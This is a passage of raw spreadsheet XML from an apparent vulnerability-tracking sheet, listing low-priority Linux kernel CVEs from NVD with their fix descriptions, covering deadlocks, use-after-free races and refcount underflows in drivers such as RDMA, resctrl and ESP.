      <c r="L914" s="5" t="inlineStr"/>
      <c r="M914" s="5" t="inlineStr"/>
      <c r="N914" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O914" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P914" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q914" s="5" t="inlineStr"/>
      <c r="R914" s="5" t="inlineStr"/>
      <c r="S914" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
rpmsg: glink: fix deadlock in endpoint destroy during driver detach
During driver detach, the device core holds the device mutex throughout
the driver's remove callback chain.  When the rpmsg endpoint is
destroyed as part of that teardown, the GLINK endpoint destroy
implementation attempts to unregister the underlying rpmsg device.
That unregistration calls device_del(), which tries to re-acquire the
same device mutex already held higher up the stack, causing rmmod to
hang indefinitely.
The deadlock manifests with the following call chain:
[&lt;0&gt;] device_del+0x44/0x414  &lt;- tries to acquire same mutex
[&lt;0&gt;] device_unregister+0x18/0x34
[&lt;0&gt;] rpmsg_unregister_device+0x28/0x4c
[&lt;0&gt;] qcom_glink_remove_rpmsg_device+0x70/0xc0
[&lt;0&gt;] qcom_glink_destroy_ept+0x58/0xbc
[&lt;0&gt;] rpmsg_dev_remove+0x50/0x60
[&lt;0&gt;] device_remove+0x4c/0x80
[&lt;0&gt;] device_release_driver_internal+0x1cc/0x228  &lt;- acquires device mutex
[&lt;0&gt;] driver_detach+0x4c/0x98
[&lt;0&gt;] bus_remove_driver+0x6c/0xbc
[&lt;0&gt;] driver_unregister+0x30/0x60
[&lt;0&gt;] unregister_rpmsg_driver+0x10/0x1c
[&lt;0&gt;] fastrpc_exit+0x28/0x38 [fastrpc]
[&lt;0&gt;] __arm64_sys_delete_module+0x1b8/0x294
[&lt;0&gt;] invoke_syscall+0x48/0x10c
[&lt;0&gt;] el0_svc_common.constprop.0+0xc0/0xe0
[&lt;0&gt;] do_el0_svc+0x1c/0x28
[&lt;0&gt;] el0_svc+0x34/0x108
[&lt;0&gt;] el0t_64_sync_handler+0xa0/0xe4
[&lt;0&gt;] el0t_64_sync+0x198/0x19c
The rpmsg device unregistration inside endpoint destroy is redundant.
In both contexts where endpoint destruction is triggered:
- Driver detach path: the driver core already tears down the rpmsg
  device.
- Channel close path: the rpmsg device is already unregistered before
  endpoint destruction is reached.
Remove the redundant unregistration to fix the deadlock.</t>
        </is>
      </c>
      <c r="T914" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93098</t>
        </is>
      </c>
    </row>
    <row r="915">
      <c r="A915" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B915" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C915" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93099</t>
        </is>
      </c>
      <c r="D915" s="5" t="inlineStr"/>
      <c r="E915" s="5" t="inlineStr"/>
      <c r="F915" s="5" t="inlineStr"/>
      <c r="G915" s="5" t="inlineStr"/>
      <c r="H915" s="5" t="inlineStr"/>
      <c r="I915" s="5" t="inlineStr"/>
      <c r="J915" s="5" t="inlineStr"/>
      <c r="K915" s="5" t="inlineStr"/>
      <c r="L915" s="5" t="inlineStr"/>
      <c r="M915" s="5" t="inlineStr"/>
      <c r="N915" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O915" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P915" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q915" s="5" t="inlineStr"/>
      <c r="R915" s="5" t="inlineStr"/>
      <c r="S915" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/resctrl: Fix UAF from worker threads when domains are removed
The mbm_handle_overflow() and cqm_handle_limbo() workers read event counters
and may sleep while doing so. They are scheduled via delayed_work embedded in
struct rdt_l3_mon_domain. Architecture allocates and frees these domains from
CPU hotplug callbacks under cpus_write_lock(), and the workers acquire
cpus_read_lock() to keep the domain alive across their access.
A use-after-free can occur when a worker is blocked waiting for
cpus_read_lock() while the hotplug core holds cpus_write_lock(): the
architecture frees the rdt_l3_mon_domain that contains the worker's
work_struct. When the worker unblocks, the container_of() it performs on the
embedded work pointer dereferences freed memory.
Drop cpus_read_lock() from the workers and instead drain pending and in-flight
work synchronously before the architecture can free the domain.  Since
architecture offlines the domain under cpus_write_lock() after it has been
unlinked from the RCU list and a grace period has elapsed, no new work can be
scheduled. The cancel only needs to wait out existing work.  Drop
rdtgroup_mutex during CPU offline around cancel_delayed_work_sync() so that
a worker waiting on the mutex can complete before re-pinning the work on
a different CPU.
When offlining a CPU the architecture may iterate over resources in any order.
For example, the MBA control domain may be offlined before or after
a corresponding L3 monitor domain. Ensure that resctrl fs cancels the workers
no matter what order the architecture offlines the domains.</t>
        </is>
      </c>
      <c r="T915" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93099</t>
        </is>
      </c>
    </row>
    <row r="916">
      <c r="A916" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B916" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C916" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93100</t>
        </is>
      </c>
      <c r="D916" s="5" t="inlineStr"/>
      <c r="E916" s="5" t="inlineStr"/>
      <c r="F916" s="5" t="inlineStr"/>
      <c r="G916" s="5" t="inlineStr"/>
      <c r="H916" s="5" t="inlineStr"/>
      <c r="I916" s="5" t="inlineStr"/>
      <c r="J916" s="5" t="inlineStr"/>
      <c r="K916" s="5" t="inlineStr"/>
      <c r="L916" s="5" t="inlineStr"/>
      <c r="M916" s="5" t="inlineStr"/>
      <c r="N916" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O916" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P916" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q916" s="5" t="inlineStr"/>
      <c r="R916" s="5" t="inlineStr"/>
      <c r="S916" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
fs/resctrl: Prevent use-after-free in rdtgroup_kn_put()
A struct rdtgroup is reference counted via rdtgroup::waitcount. Callers that
need the structure to remain valid across a sleep (while waiting on acquiring
rdtgroup_mutex) take a reference with rdtgroup_kn_get() and release it with
rdtgroup_kn_put().
The release path is intended to serve as the fallback freer: if the count
drops to zero and the group has already been marked RDT_DELETED,
rdtgroup_kn_put() frees the structure.
The bulk teardown paths free_all_child_rdtgrp() and rmdir_all_sub() resulting
from a resctrl directory remove or resctrl fs unmount act as the primary
freer: they hold rdtgroup_mutex and free each rdtgroup whose waitcount is
zero, otherwise they set RDT_DELETED and leave the freeing to the last waiter.
These two freers race. rdtgroup_kn_put() commits waitcount == 0 with
atomic_dec_and_test() outside rdtgroup_mutex, then reads rdtgroup::flags.
Between those two operations a concurrent caller of free_all_child_rdtgrp()
or rmdir_all_sub() (which holds the mutex) can observe waitcount == 0 via
atomic_read(), call rdtgroup_remove(), and kfree() the structure.
The subsequent read of rdtgroup::flags in rdtgroup_kn_put() is then
a use-after-free, and the structure may even be freed twice if the freed
memory happens to satisfy the RDT_DELETED flag check.
Replace the bare atomic_dec_and_test() with atomic_dec_and_mutex_lock() so
that the decrement-to-zero takes rdtgroup_mutex before the count becomes
globally visible. The inspection of rdtgroup::flags then runs under the same
mutex held by the bulk freers, making the two paths mutually exclusive.
The common case where the count does not reach zero remains lock-free. Defer
kernfs_unbreak_active_protection() until after the mutex is dropped since
kernfs active protections functionally wrap rdtgroup_mutex. Remove resource
group, which in turn drops its kernfs reference, after kernfs protection is
restored.
  [ bp: Split the commit messsages into smaller, easier-parseable paragraphs. ]</t>
        </is>
      </c>
      <c r="T916" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93100</t>
        </is>
      </c>
    </row>
    <row r="917">
      <c r="A917" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B917" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C917" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93101</t>
        </is>
      </c>
      <c r="D917" s="5" t="inlineStr"/>
      <c r="E917" s="5" t="inlineStr"/>
      <c r="F917" s="5" t="inlineStr"/>
      <c r="G917" s="5" t="inlineStr"/>
      <c r="H917" s="5" t="inlineStr"/>
      <c r="I917" s="5" t="inlineStr"/>
      <c r="J917" s="5" t="inlineStr"/>
      <c r="K917" s="5" t="inlineStr"/>
      <c r="L917" s="5" t="inlineStr"/>
      <c r="M917" s="5" t="inlineStr"/>
      <c r="N917" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O917" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P917" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q917" s="5" t="inlineStr"/>
      <c r="R917" s="5" t="inlineStr"/>
      <c r="S917" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
media: v4l2-async: Unregister sub-device if asc_list is empty
When my em28xx USB device that uses the i2c tvp5150 driver is
disconnected, it crashes.
The cause is that the tvp5150 i2c module uses v4l2_async, but
the em28xx driver does not since it predates v4l2_async.
In that corner case sd-&gt;asc_list is empty, so
v4l2_async_unregister_subdev() never calls v4l2_device_unregister_subdev().
Modify the code so that, if sd-&gt;asc_list is empty,
v4l2_device_unregister_subdev() is still called.</t>
        </is>
      </c>
      <c r="T917" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93101</t>
        </is>
      </c>
    </row>
    <row r="918">
      <c r="A918" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B918" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C918" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93102</t>
        </is>
      </c>
      <c r="D918" s="5" t="inlineStr"/>
      <c r="E918" s="5" t="inlineStr"/>
      <c r="F918" s="5" t="inlineStr"/>
      <c r="G918" s="5" t="inlineStr"/>
      <c r="H918" s="5" t="inlineStr"/>
      <c r="I918" s="5" t="inlineStr"/>
      <c r="J918" s="5" t="inlineStr"/>
      <c r="K918" s="5" t="inlineStr"/>
      <c r="L918" s="5" t="inlineStr"/>
      <c r="M918" s="5" t="inlineStr"/>
      <c r="N918" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O918" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P918" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q918" s="5" t="inlineStr"/>
      <c r="R918" s="5" t="inlineStr"/>
      <c r="S918" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/hfi1: Free RX data on late probe failure
hfi1_init_dd() allocates the shared AIP/VNIC RX support before returning.
If hfi1_init() or hfi1_register_ib_device() later fails, init_one() tears
down the device data without calling hfi1_free_rx(). This leaks netdev_rx
and its dummy netdev.
Free the RX support after IB unregistration and before postinit_cleanup(),
as done on normal device removal.</t>
        </is>
      </c>
      <c r="T918" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93102</t>
        </is>
      </c>
    </row>
    <row r="919">
      <c r="A919" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B919" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C919" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93103</t>
        </is>
      </c>
      <c r="D919" s="5" t="inlineStr"/>
      <c r="E919" s="5" t="inlineStr"/>
      <c r="F919" s="5" t="inlineStr"/>
      <c r="G919" s="5" t="inlineStr"/>
      <c r="H919" s="5" t="inlineStr"/>
      <c r="I919" s="5" t="inlineStr"/>
      <c r="J919" s="5" t="inlineStr"/>
      <c r="K919" s="5" t="inlineStr"/>
      <c r="L919" s="5" t="inlineStr"/>
      <c r="M919" s="5" t="inlineStr"/>
      <c r="N919" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O919" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P919" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q919" s="5" t="inlineStr"/>
      <c r="R919" s="5" t="inlineStr"/>
      <c r="S919" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/hfi1: Preserve unit 0 on allocation failure
hfi1_free_devdata() assumes that the device was inserted into the unit
table and unconditionally erases dd-&gt;unit. If xa_alloc_irq() fails, the
zero-initialized unit remains zero, so full cleanup can remove an
unrelated device from index 0.
Release only the rdmavt allocation and return immediately while the unit
table has not acquired the device.</t>
        </is>
      </c>
      <c r="T919" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93103</t>
        </is>
      </c>
    </row>
    <row r="920">
      <c r="A920" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B920" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C920" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93104</t>
        </is>
      </c>
      <c r="D920" s="5" t="inlineStr"/>
      <c r="E920" s="5" t="inlineStr"/>
      <c r="F920" s="5" t="inlineStr"/>
      <c r="G920" s="5" t="inlineStr"/>
      <c r="H920" s="5" t="inlineStr"/>
      <c r="I920" s="5" t="inlineStr"/>
      <c r="J920" s="5" t="inlineStr"/>
      <c r="K920" s="5" t="inlineStr"/>
      <c r="L920" s="5" t="inlineStr"/>
      <c r="M920" s="5" t="inlineStr"/>
      <c r="N920" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O920" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P920" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q920" s="5" t="inlineStr"/>
      <c r="R920" s="5" t="inlineStr"/>
      <c r="S920" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/rvt: Return NULL after port allocation failure
rvt_alloc_device() deallocates the IB device when its port array cannot
be allocated but then returns the pointer to the released allocation.
Callers treat any non-NULL value as valid and dereference it, resulting
in a use-after-free.
Return NULL immediately after deallocation so callers can propagate the
allocation failure.</t>
        </is>
      </c>
      <c r="T920" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93104</t>
        </is>
      </c>
    </row>
    <row r="921">
      <c r="A921" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B921" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C921" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93105</t>
        </is>
      </c>
      <c r="D921" s="5" t="inlineStr"/>
      <c r="E921" s="5" t="inlineStr"/>
      <c r="F921" s="5" t="inlineStr"/>
      <c r="G921" s="5" t="inlineStr"/>
      <c r="H921" s="5" t="inlineStr"/>
      <c r="I921" s="5" t="inlineStr"/>
      <c r="J921" s="5" t="inlineStr"/>
      <c r="K921" s="5" t="inlineStr"/>
      <c r="L921" s="5" t="inlineStr"/>
      <c r="M921" s="5" t="inlineStr"/>
      <c r="N921" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O921" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P921" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q921" s="5" t="inlineStr"/>
      <c r="R921" s="5" t="inlineStr"/>
      <c r="S921" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
esp: do not unref managed frag pages in esp_ssg_unref()
esp_ssg_unref() releases the page references held on the source
scatterlist after the AEAD operation completes.  It calls
skb_page_unref() on every frag page for an out-of-place transform
(req-&gt;src != req-&gt;dst), and in the error path of esp_output_tail()
(already_unref == true) on the request's own scatterlist.
This is wrong when the skb carries managed frags
(SKBFL_MANAGED_FRAG_REFS).  Managed frags are owned by a zerocopy ubuf
and the skb does not hold a per-frag page reference; io_uring SEND_ZC
with a registered buffer attaches the bvec pages this way via
io_sg_from_iter().  The rest of the stack honours this invariant:
skb_release_data() skips the per-frag unref when SKBFL_MANAGED_FRAG_REFS
is set, and skb_zcopy_managed() is the guard used at the other unref
sites.
esp_ssg_unref() is missing that guard, so for a managed-frag skb it
drops a page reference the skb never acquired.  This can underflow the
page reference count and free a page that is still in use.
Guard the function with skb_zcopy_managed() so both unref paths are
skipped for managed-frag skbs, matching skb_release_data().</t>
        </is>
      </c>
      <c r="T921" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93105</t>
        </is>
      </c>
    </row>
    <row r="922">
      <c r="A922" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B922" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C922" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93106</t>
        </is>
      </c>
      <c r="D922" s="5" t="inlineStr"/>
      <c r="E922" s="5" t="inlineStr"/>
      <c r="F922" s="5" t="inlineStr"/>
      <c r="G922" s="5" t="inlineStr"/>
      <c r="H922" s="5" t="inlineStr"/>
      <c r="I922" s="5" t="inlineStr"/>
      <c r="J922" s="5" t="inlineStr"/>
      <c r="K922" s="5" t="inlineStr"/>
      <c r="L922" s="5" t="inlineStr"/>
      <c r="M922" s="5" t="inlineStr"/>
      <c r="N922" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O922" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P922" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q922" s="5" t="inlineStr"/>
      <c r="R922" s="5" t="inlineStr"/>
      <c r="S922" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
crash_dump: release keyring reference at the correct time
restore_dm_crypt_keys_to_thread_keyring() gets a reference to the user
keyring before restoring the saved dm-crypt keys.
The same keyring reference is then passed to add_key_to_keyring() for each
saved key, but add_key_to_keyring() drops that reference on every call.
This is only balanced when exactly one key is restored. With multiple
keys, the keyring reference is dropped too many times and may trigger a
refcount underflow or use-after-free.
When more than five keys are restored, a refcount underflow/use-after-free
warning can be triggered.
The early error paths after lookup_user_key() also return without dropping
the keyring reference.
Keep ownership of the keyring reference in
restore_dm_crypt_keys_to_thread_keyring(), drop it once on all exit paths,
and make add_key_to_keyring() only use the reference without consuming it.</t>
        </is>
      </c>
      <c r="T922" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93106</t>
        </is>
      </c>
    </row>
    <row r="923">
      <c r="A923" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B923" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C923" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93107</t>
        </is>
      </c>
      <c r="D923" s="5" t="inlineStr"/>
      <c r="E923" s="5" t="inlineStr"/>
      <c r="F923" s="5" t="inlineStr"/>
      <c r="G923" s="5" t="inlineStr"/>
      <c r="H923" s="5" t="inlineStr"/>
      <c r="I923" s="5" t="inlineStr"/>
      <c r="J923" s="5" t="inlineStr"/>
      <c r="K923" s="5" t="inlineStr"/>
      <c r="L923" s="5" t="inlineStr"/>
      <c r="M923" s="5" t="inlineStr"/>
      <c r="N923" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O923" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P923" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q923" s="5" t="inlineStr"/>
      <c r="R923" s="5" t="inlineStr"/>
      <c r="S923" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/rxe: Avoid reprocessing the current packet after the QP enters the error state
When do_complete() finds the QP in the error state it returns
RESPST_CHK_RESOURCE.  Before commit 49dc9c1f0c7e ("RDMA/rxe: Cleanup
reset state handling in rxe_resp.c") this was the flush loop:
check_resource() had an error-state branch that fetched each remaining
recv WQE and completed it with IB_WC_WR_FLUSH_ERR, without touching
the current packet.  That commit removed the error-state branch from
check_resource() (draining is now done at rxe_receiver() entry) but
kept the do_complete() error-state return.
As a result, when a QP moves to the error state while a packet is
being completed - e.g. an rdma_cm disconnect racing with receive
processing - the responder state machine loops back into the request
processing chain with the already-completed packet still in hand:
check_resource() fetches a fresh recv WQE, execute()/send_data_in()
copies the same packet payload again, do_complete() posts another
IB_WC_SUCCESS CQE (qp-&gt;resp.status is still 0), and control returns
to the error-state check.  The loop re-executes the same packet once
per posted recv WQE (observed: ~1000 duplicate IB_WC_SUCCESS
completions of one SEND, one per ~8us, matching the RQ occupancy)
until the RQ is exhausted, after which qp-&gt;resp.wqe is NULL and
send_data_in() dereferences it:
  BUG: kernel NULL pointer dereference, address: 0000000000000014
  Workqueue: rxe_wq do_work
  RIP: copy_data+0x29/0x1f0
  Call Trace:
   send_data_in+0x25/0x50
   rxe_receiver+0xf36/0x1dd0
The duplicate completions are indistinguishable from real receives to
the ULP.  During an rds stress test, the message was accepted as new and
delivered the same datagram to user space hundreds of times, corrupting
the stream; any ULP that relies on RC exactly-once delivery is affected.
A live packet reaching the error-state check in do_complete() has
been executed and completed exactly once and must be consumed, not
re-processed.  Return RESPST_CLEANUP for it (dequeue and free); keep
returning RESPST_CHK_RESOURCE for the pkt == NULL case.</t>
        </is>
      </c>
      <c r="T923" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93107</t>
        </is>
      </c>
    </row>
    <row r="924">
      <c r="A924" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B924" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C924" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93108</t>
        </is>
      </c>
      <c r="D924" s="5" t="inlineStr"/>
      <c r="E924" s="5" t="inlineStr"/>
      <c r="F924" s="5" t="inlineStr"/>
      <c r="G924" s="5" t="inlineStr"/>
      <c r="H924" s="5" t="inlineStr"/>
      <c r="I924" s="5" t="inlineStr"/>
      <c r="J924" s="5" t="inlineStr"/>
      <c r="K924" s="5" t="inlineStr"/>
      <c r="L924" s="5" t="inlineStr"/>
      <c r="M924" s="5" t="inlineStr"/>
      <c r="N924" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O924" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P924" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q924" s="5" t="inlineStr"/>
      <c r="R924" s="5" t="inlineStr"/>
      <c r="S924" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/ipoib: Drain RCU callbacks during module teardown
IPoIB reclamation completions can be signaled from inside an RCU callback.
Teardown can wake before the callback returns and unload ib_ipoib while its
code is still executing.
Client registration failure can also remove already-added devices and queue
callbacks. Wait after client and workqueue teardown.</t>
        </is>
      </c>
      <c r="T924" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93108</t>
        </is>
      </c>
    </row>
    <row r="925">
      <c r="A925" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B925" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C925" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93109</t>
        </is>
      </c>
      <c r="D925" s="5" t="inlineStr"/>
      <c r="E925" s="5" t="inlineStr"/>
      <c r="F925" s="5" t="inlineStr"/>
      <c r="G925" s="5" t="inlineStr"/>
      <c r="H925" s="5" t="inlineStr"/>
      <c r="I925" s="5" t="inlineStr"/>
      <c r="J925" s="5" t="inlineStr"/>
      <c r="K925" s="5" t="inlineStr"/>
      <c r="L925" s="5" t="inlineStr"/>
      <c r="M925" s="5" t="inlineStr"/>
      <c r="N925" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O925" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P925" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q925" s="5" t="inlineStr"/>
      <c r="R925" s="5" t="inlineStr"/>
      <c r="S925" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/mlx5: Drain RCU callbacks during module teardown
devx_free_subscription() can remain queued after the last DevX event file
drops its module reference or an auxiliary driver detaches its devices.
mlx5_ib can then unload before the callback runs.
Registration error unwind has the same risk because driver registration
can attach existing devices before failing. Wait after all drivers have
stopped.</t>
        </is>
      </c>
      <c r="T925" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93109</t>
        </is>
      </c>
    </row>
    <row r="926">
      <c r="A926" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B926" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C926" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93110</t>
        </is>
      </c>
      <c r="D926" s="5" t="inlineStr"/>
      <c r="E926" s="5" t="inlineStr"/>
      <c r="F926" s="5" t="inlineStr"/>
      <c r="G926" s="5" t="inlineStr"/>
      <c r="H926" s="5" t="inlineStr"/>
      <c r="I926" s="5" t="inlineStr"/>
      <c r="J926" s="5" t="inlineStr"/>
      <c r="K926" s="5" t="inlineStr"/>
      <c r="L926" s="5" t="inlineStr"/>
      <c r="M926" s="5" t="inlineStr"/>
      <c r="N926" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O926" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P926" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q926" s="5" t="inlineStr"/>
      <c r="R926" s="5" t="inlineStr"/>
      <c r="S926" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
RDMA/core: Wait for RCU callbacks before unloading ib_core
put_gid_ndev() is queued with call_rcu() and implemented in ib_core.
Stopping the workqueues does not drain callbacks already queued, so RCU
could invoke it after the module code has been unloaded.
synchronize_rcu() does not wait for callbacks. Wait for them after all
producers have stopped.</t>
        </is>
      </c>
      <c r="T926" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-93110</t>
        </is>
      </c>
    </row>
    <row r="927">
      <c r="A927" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B927" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C927" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-93111</t>
        </is>
      </c>
      <c r="D927" s="5" t="inlineStr"/>
      <c r="E927" s="5" t="inlineStr"/>
      <c r="F927" s="5" t="inlineStr"/>
      <c r="G927" s="5" t="inlineStr"/>
      <c r="H927" s="5" t="inlineStr"/>
      <c r="I927" s="5" t="inlineStr"/>
      <c r="J927" s="5" t="inlineStr"/>
      <c r="K927" s="5" t="inlineStr"/>
      <c r="L927" s="5" t="inlineStr"/>
      <c r="M927" s="5" t="inlineStr"/>
      <c r="N927" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O927" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="P927" s="5" t="inlineStr">
        <is>
          <t>2026-09-17</t>
        </is>
      </c>
      <c r="Q927" s="5" t="inlineStr"/>
      <c r="R927" s="5" t="inlineStr"/>
      <c r="S927" s="5" t="inlineStr">
        <is>
          <t>In the Linux kernel, the following vulnerability has been resolved:
bpf: Mark tracing_multi trampolines as ftrace managed
Since tracing_multi link does not set ftrace_managed, it would fail to
release the tracing_multi link when attaching tracing_multi link and
then attaching fentry link.
[    3.714215] WARNING: kernel/bpf/trampoline.c:1727 at bpf_trampoline_multi_detach+0x20b/0x240, CPU#1: test_progs/97
...
[    3.733170]  bpf_tracing_multi_link_release+0x14/0x30
[    3.733890]  bpf_link_free+0x58/0x130
[    3.734414]  bpf_link_release+0x23/0x30
